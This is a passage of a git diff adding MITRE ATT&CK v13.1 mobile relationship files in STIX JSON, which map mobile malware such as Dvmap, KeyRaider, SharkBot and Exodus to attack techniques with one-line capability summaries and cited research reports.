"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--04eeed4b-e0fc-4fff-8c61-4c175f26a0fe.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--04eeed4b-e0fc-4fff-8c61-4c175f26a0fe.json new file mode 100644 index 0000000000000000000000000000000000000000..74f2c160788566439f6a4236c3f44eebe59e010d --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--04eeed4b-e0fc-4fff-8c61-4c175f26a0fe.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--a7241d18-a529-4e82-827b-314cdcc2b386", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--04eeed4b-e0fc-4fff-8c61-4c175f26a0fe", + "type": "relationship", + "created": "2019-12-10T16:07:41.093Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SecureList DVMap June 2017", + "url": "https://securelist.com/dvmap-the-first-android-malware-with-code-injection/78648/", + "description": "R. Unuchek. (2017, June 8). Dvmap: the first Android malware with code injection. Retrieved December 10, 2019." + } + ], + "modified": "2019-12-10T16:07:41.093Z", + "description": "[Dvmap](https://attack.mitre.org/software/S0420) can download code and binaries from the C2 server to execute on the device as root.(Citation: SecureList DVMap June 2017)", + "relationship_type": "uses", + "source_ref": "malware--22b596a6-d288-4409-8520-5f2846f85514", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--05563777-5771-4bd6-a1af-3e244cf42372.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--05563777-5771-4bd6-a1af-3e244cf42372.json new file mode 100644 index 0000000000000000000000000000000000000000..3d5483156e7e4374f4c811e7db0a561ce7a585ce --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--05563777-5771-4bd6-a1af-3e244cf42372.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--4b7b6615-a2b1-447f-a800-30825c31aa8b", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--05563777-5771-4bd6-a1af-3e244cf42372", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Xiao-KeyRaider", + "description": "Claud Xiao. (2015, August 30). KeyRaider: iOS Malware Steals Over 225,000 Apple Accounts to Create Free App Utopia. Retrieved December 12, 2016.", + "url": "http://researchcenter.paloaltonetworks.com/2015/08/keyraider-ios-malware-steals-over-225000-apple-accounts-to-create-free-app-utopia/" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "description": "Most [KeyRaider](https://attack.mitre.org/software/S0288) samples search to find the Apple account's username, password and device's GUID in data being transferred.(Citation: Xiao-KeyRaider)", + "relationship_type": "uses", + "source_ref": "malware--3bc1f0ad-ef11-4afc-83c0-fcffe08d4e50", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0569a1e0-1eb5-4e87-ae09-b698571012ef.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0569a1e0-1eb5-4e87-ae09-b698571012ef.json new file mode 100644 index 0000000000000000000000000000000000000000..f547285472479beeefea9d37e14501231f319d2a --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0569a1e0-1eb5-4e87-ae09-b698571012ef.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--60fb0e40-a9cd-407d-8b36-6ac70f5ace90", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--0569a1e0-1eb5-4e87-ae09-b698571012ef", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout-StealthMango", + "description": "Lookout. (n.d.). Stealth Mango & Tangelo. Retrieved September 27, 2018.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/lookout-stealth-mango-srr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:22:32.033Z", + "description": "[Tangelo](https://attack.mitre.org/software/S0329) contains functionality to gather SMS messages.(Citation: Lookout-StealthMango)", + "relationship_type": "uses", + "source_ref": "malware--35aae10a-97c5-471a-9c67-02c231a7a31a", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--05c57e75-04b8-4bf6-8022-2e89f74e4b76.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--05c57e75-04b8-4bf6-8022-2e89f74e4b76.json new file mode 100644 index 0000000000000000000000000000000000000000..c90ab1f0762639103e8c6a4d9f43d06e715408ed --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--05c57e75-04b8-4bf6-8022-2e89f74e4b76.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--a9ef43ea-b205-4e44-8cdf-0c474527bbe1", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--05c57e75-04b8-4bf6-8022-2e89f74e4b76", + "created": "2020-12-17T20:15:22.441Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Palo Alto HenBox", + "description": "A. Hinchliffe, M. Harbison, J. Miller-Osborn, et al. (2018, March 13). HenBox: The Chickens Come Home to Roost. Retrieved September 9, 2019.", + "url": "https://unit42.paloaltonetworks.com/unit42-henbox-chickens-come-home-roost/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:35:41.700Z", + "description": "[HenBox](https://attack.mitre.org/software/S0544) has collected all outgoing phone numbers that start with \u201c86\u201d.(Citation: Palo Alto HenBox)", + "relationship_type": "uses", + "source_ref": "malware--aef537ba-10c2-40ed-a57a-80b8508aada4", + "target_ref": "attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--06348e22-9a06-4e4c-a57c-e438462e7fce.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--06348e22-9a06-4e4c-a57c-e438462e7fce.json new file mode 100644 index 0000000000000000000000000000000000000000..f76192f01eb9e25eb3ee87edb8f4440ea26eb64e --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--06348e22-9a06-4e4c-a57c-e438462e7fce.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--ed18ae1d-2d17-49cb-aa60-c1c8af7cdd7b", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--06348e22-9a06-4e4c-a57c-e438462e7fce", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://securelist.com/skygofree-following-in-the-footsteps-of-hackingteam/83603/", + "description": "Nikita Buchka and Alexey Firsh. (2018, January 16). Skygofree: Following in the footsteps of HackingTeam. Retrieved September 24, 2018.", + "source_name": "Kaspersky-Skygofree" + } + ], + "modified": "2019-08-09T18:08:07.173Z", + "description": "[Skygofree](https://attack.mitre.org/software/S0327) can record audio via the microphone when an infected device is in a specified location.(Citation: Kaspersky-Skygofree)", + "relationship_type": "uses", + "source_ref": "malware--3a913bac-4fae-4d0e-bca8-cae452f1599b", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--069b2328-442b-491e-962d-d3fe01f0549e.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--069b2328-442b-491e-962d-d3fe01f0549e.json new file mode 100644 index 0000000000000000000000000000000000000000..10a96d8659e1ce920f1f58c77a0239e9be1ba9cf --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--069b2328-442b-491e-962d-d3fe01f0549e.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--1cacf883-68c7-44df-ac68-8ba09e0c99bd", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--069b2328-442b-491e-962d-d3fe01f0549e", + "created": "2019-09-04T14:28:15.479Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Lookout-Monokle", + "url": "https://www.lookout.com/documents/threat-reports/lookout-discovers-monokle-threat-report.pdf", + "description": "Bauer A., Kumar A., Hebeisen C., et al. (2019, July). Monokle: The Mobile Surveillance Tooling of the Special Technology Center. Retrieved September 4, 2019." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Monokle](https://attack.mitre.org/software/S0407) can be controlled via email and SMS from a set of \"control phones.\"(Citation: Lookout-Monokle)", + "modified": "2022-04-19T14:25:41.669Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--6a7aaab1-3e0a-48bb-ba66-bbf7665c0a65", + "target_ref": "attack-pattern--ec4c4baa-026f-43e8-8f56-58c36f3162dd", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--07036963-6f5e-4eb5-9b20-3f81dd582c85.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--07036963-6f5e-4eb5-9b20-3f81dd582c85.json new file mode 100644 index 0000000000000000000000000000000000000000..72375a3e0be20359368045fb7ef210970db30965 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--07036963-6f5e-4eb5-9b20-3f81dd582c85.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--53a8b3c9-4691-4d22-974d-689553037717", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--07036963-6f5e-4eb5-9b20-3f81dd582c85", + "type": "relationship", + "created": "2020-11-20T16:37:28.547Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Symantec GoldenCup", + "url": "https://symantec-enterprise-blogs.security.com/blogs/expert-perspectives/goldencup-new-cyber-threat-targeting-world-cup-fans", + "description": "R. Iarchy, E. Rynkowski. (2018, July 5). GoldenCup: New Cyber Threat Targeting World Cup Fans. Retrieved October 29, 2020." + } + ], + "modified": "2020-11-20T16:37:28.547Z", + "description": "[Golden Cup](https://attack.mitre.org/software/S0535) can collect various pieces of device information, such as serial number and product information.(Citation: Symantec GoldenCup)", + "relationship_type": "uses", + "source_ref": "malware--f3975cc0-72bc-4308-836e-ac701b83860e", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0727ac06-5b46-4f79-abe9-63c1b923d383.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0727ac06-5b46-4f79-abe9-63c1b923d383.json new file mode 100644 index 0000000000000000000000000000000000000000..4131826d243601a3ae347474106d8e5bcda1116d --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0727ac06-5b46-4f79-abe9-63c1b923d383.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--48d233c6-99a2-4e33-a238-c8eb4a9fdfd2", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--0727ac06-5b46-4f79-abe9-63c1b923d383", + "created": "2023-02-06T19:05:56.974Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "lookout_abstractemu_1021", + "description": "P Shunk, K Balaam. (2021, October 28). Rooting Malware Makes a Comeback: Lookout Discovers Global Campaign. Retrieved February 6, 2023.", + "url": "https://www.lookout.com/blog/lookout-discovers-global-rooting-malware-campaign" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T17:07:11.541Z", + "description": "[AbstractEmu](https://attack.mitre.org/software/S1061) has included encoded shell scripts to potentially aid in the rooting process.(Citation: lookout_abstractemu_1021)", + "relationship_type": "uses", + "source_ref": "malware--2aec175b-4429-4048-8e09-3ef6cbecfc64", + "target_ref": "attack-pattern--693cdbff-ea73-49c6-ac3f-91e7285c31d1", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--078653a6-3613-4923-ae5a-1bccb8552e67.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--078653a6-3613-4923-ae5a-1bccb8552e67.json new file mode 100644 index 0000000000000000000000000000000000000000..bb560afdd42604b0023d4a26c52844695c0d1485 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--078653a6-3613-4923-ae5a-1bccb8552e67.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--5dc712c4-0005-4af2-83a0-26d64e4c1c31", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--078653a6-3613-4923-ae5a-1bccb8552e67", + "type": "relationship", + "created": "2020-09-11T16:22:03.250Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout ViperRAT", + "url": "https://blog.lookout.com/viperrat-mobile-apt", + "description": "M. Flossman. (2017, February 16). ViperRAT: The mobile APT targeting the Israeli Defense Force that should be on your radar. Retrieved September 11, 2020." + } + ], + "modified": "2020-09-11T16:22:03.250Z", + "description": "[ViperRAT](https://attack.mitre.org/software/S0506) has been installed in two stages and can secretly install new applications.(Citation: Lookout ViperRAT)", + "relationship_type": "uses", + "source_ref": "malware--f666e17c-b290-43b3-8947-b96bd5148fbb", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0791f28b-d06f-4fee-9cdb-85a6fd2eed61.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0791f28b-d06f-4fee-9cdb-85a6fd2eed61.json new file mode 100644 index 0000000000000000000000000000000000000000..9071c4f7eced2764051d1e780d98ac29954230fa --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0791f28b-d06f-4fee-9cdb-85a6fd2eed61.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--45d05a23-5a1d-46a8-bb26-054e638aeae8", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--0791f28b-d06f-4fee-9cdb-85a6fd2eed61", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "PaloAlto-WireLurker", + "description": "Claud Xiao. (2014, November 5). WireLurker: A New Era in OS X and iOS Malware. Retrieved January 24, 2017.", + "url": "https://researchcenter.paloaltonetworks.com/2014/11/wirelurker-new-era-os-x-ios-malware/" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "description": "[WireLurker](https://attack.mitre.org/software/S0312) monitors for iOS devices connected via USB to an infected OSX computer and installs downloaded third-party applications or automatically generated malicious applications onto the device.(Citation: PaloAlto-WireLurker)", + "relationship_type": "uses", + "source_ref": "malware--326eaf7b-5784-4f08-8fc2-61fd5d5bc5fb", + "target_ref": "attack-pattern--667e5707-3843-4da8-bd34-88b922526f0d", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--07dd3318-2965-4085-be64-a8e956c7b8da.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--07dd3318-2965-4085-be64-a8e956c7b8da.json new file mode 100644 index 0000000000000000000000000000000000000000..7142b788c5c85bed12bbfe69f1db285701fece2e --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--07dd3318-2965-4085-be64-a8e956c7b8da.json @@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--372a39cc-587a-4cb2-8613-9725a4cc797b", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--07dd3318-2965-4085-be64-a8e956c7b8da", + "type": "relationship", + "created": "2020-12-18T20:14:47.319Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "WhiteOps TERRACOTTA", + "url": "https://www.whiteops.com/blog/terracotta-android-malware-a-technical-study", + "description": "Satori Threat Intelligence and Research Team. (2020, August). TERRACOTTA Android Malware: A Technical Study. Retrieved December 18, 2020." + } + ], + "modified": "2020-12-18T20:14:47.319Z", + "description": "[TERRACOTTA](https://attack.mitre.org/software/S0545) has stored encoded strings.(Citation: WhiteOps TERRACOTTA)", + "relationship_type": "uses", + "source_ref": "malware--e296b110-46d3-4f7a-894c-cc71ea50168c", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--07fd2c39-c3e2-4044-b00b-71250cd7df2e.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--07fd2c39-c3e2-4044-b00b-71250cd7df2e.json new file mode 100644 index 0000000000000000000000000000000000000000..f36bd6f9aa02d61af067c36cf195fa31482115f5 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--07fd2c39-c3e2-4044-b00b-71250cd7df2e.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--42a4d5cf-8ff6-4b50-91bb-4bacd86494e7", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--07fd2c39-c3e2-4044-b00b-71250cd7df2e", + "created": "2022-03-30T18:15:03.625Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-03-30T18:15:03.625Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--fcb11f06-ce0e-490b-bcc1-04a1623579f0", + "target_ref": "attack-pattern--79cb02f4-ac4e-4335-8b51-425c9573cce1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0800f6bf-00c5-46d8-b876-1eeeb81b741f.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0800f6bf-00c5-46d8-b876-1eeeb81b741f.json new file mode 100644 index 0000000000000000000000000000000000000000..79078a1e3e685703057b4f41fad4ec2f4b4b2c3f --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--0800f6bf-00c5-46d8-b876-1eeeb81b741f.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--7148eebf-96eb-4a77-950e-914ef64b4e17", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--0800f6bf-00c5-46d8-b876-1eeeb81b741f", + "created": "2023-03-20T15:55:32.395Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T15:55:32.395Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962", + "target_ref": "attack-pattern--c548d8c4-a0a3-4a24-bb79-2a84abbc7b36", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--084786ee-9384-4a00-9e1b-48f94ea70126.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--084786ee-9384-4a00-9e1b-48f94ea70126.json new file mode 100644 index 0000000000000000000000000000000000000000..28d39593cd1259f3b360b30dc1850c55621fdc7a --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--084786ee-9384-4a00-9e1b-48f94ea70126.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--47c2a313-3c65-41c1-bce9-7bf5e0245a53", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--084786ee-9384-4a00-9e1b-48f94ea70126", + "created": "2019-09-03T19:45:48.517Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "SWB Exodus March 2019", + "description": "Security Without Borders. (2019, March 29). Exodus: New Android Spyware Made in Italy. Retrieved September 3, 2019.", + "url": "https://securitywithoutborders.org/blog/2019/03/29/exodus.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:09:45.426Z", + "description": "[Exodus](https://attack.mitre.org/software/S0405) Two can exfiltrate calendar events.(Citation: SWB Exodus March 2019) ", + "relationship_type": "uses", + "source_ref": "malware--3049b2f2-e323-4cdb-91cb-13b37b904cbb", + "target_ref": "attack-pattern--a9fa0d30-a8ff-45bf-922e-7720da0b7922", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--085f8397-0233-42d7-855e-3dbd709f2eca.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--085f8397-0233-42d7-855e-3dbd709f2eca.json new file mode 100644 index 0000000000000000000000000000000000000000..31a25e655d5d8f2aa922e831ffde6d5ddfbd8393 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--085f8397-0233-42d7-855e-3dbd709f2eca.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--40789f29-434e-4bcf-9ad8-2ab627163460", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--085f8397-0233-42d7-855e-3dbd709f2eca", + "created": "2023-01-18T21:39:27.823Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "nccgroup_sharkbot_0322", + "description": "RIFT: Research and Intelligence Fusion Team. (2022, March 3). SharkBot: a \u201cnew\u201d generation Android banking Trojan being distributed on Google Play Store. Retrieved January 18, 2023.", + "url": "https://research.nccgroup.com/2022/03/03/sharkbot-a-new-generation-android-banking-trojan-being-distributed-on-google-play-store/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T18:30:43.093Z", + "description": "[SharkBot](https://attack.mitre.org/software/S1055) can use the Android \u201cDirect Reply\u201d feature to spread the malware to other devices. It can also download the full version of the malware after initial device compromise.(Citation: nccgroup_sharkbot_0322)", + "relationship_type": "uses", + "source_ref": "malware--9cd72f5c-bec0-4f7e-bb6d-296937116291", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--086c4c17-dde7-4a1f-90d1-79eb32f3c11f.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--086c4c17-dde7-4a1f-90d1-79eb32f3c11f.json new file mode 100644 index 0000000000000000000000000000000000000000..938acd47e695b847fe6cd01695df64a1e04b0901 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--086c4c17-dde7-4a1f-90d1-79eb32f3c11f.json @@ -0,0 +1,26 @@ +{ + "type": "bundle", + "id": "bundle--94904af2-f2eb-4ebc-bb26-185662aed1a9", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--086c4c17-dde7-4a1f-90d1-79eb32f3c11f", + "created": "2023-03-20T18:58:33.787Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:58:33.787Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--087609b6-cc6c-402f-ada9-00dbcbfecbe8.json b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--087609b6-cc6c-402f-ada9-00dbcbfecbe8.json new file mode 100644 index 0000000000000000000000000000000000000000..d99a88bc71cbe54a63c5615f566065bdd49c1b03 --- /dev/null +++ b/cti-ATT-CK-v13.1/mobile-attack/relationship/relationship--087609b6-cc6c-402f-ada9-00dbcbfecbe8.json @@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--4cf8e721-11ec-4476-973d-f5982c641d5f", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--087609b6-cc6c-402f-ada9-00dbcbfecbe8", + "created": "2022-04-01T15:16:02.324Z", + "x_mitre_version": "0.1", + "external_references": [ + { + "source_name": "iOS Universal Links", + "url": "https://developer.apple.com/ios/universal-links/", + "description": "Apple. (n.d.). Universal Links for Developers. Retrieved September 11, 2020." + }, + { + "source_name": "Android App Links", + "url": "https://developer.android.com/training/app-links/verify-site-associations", + "description": "Google. (n.d.). Verify Android App Links. Retrieved September 11, 2020." + }, + { + "source_name": "IETF-PKCE", + "url": "https://tools.ietf.org/html/rfc7636", + "description": "N. Sakimura, J. Bradley, and N. Agarwal. (2015, 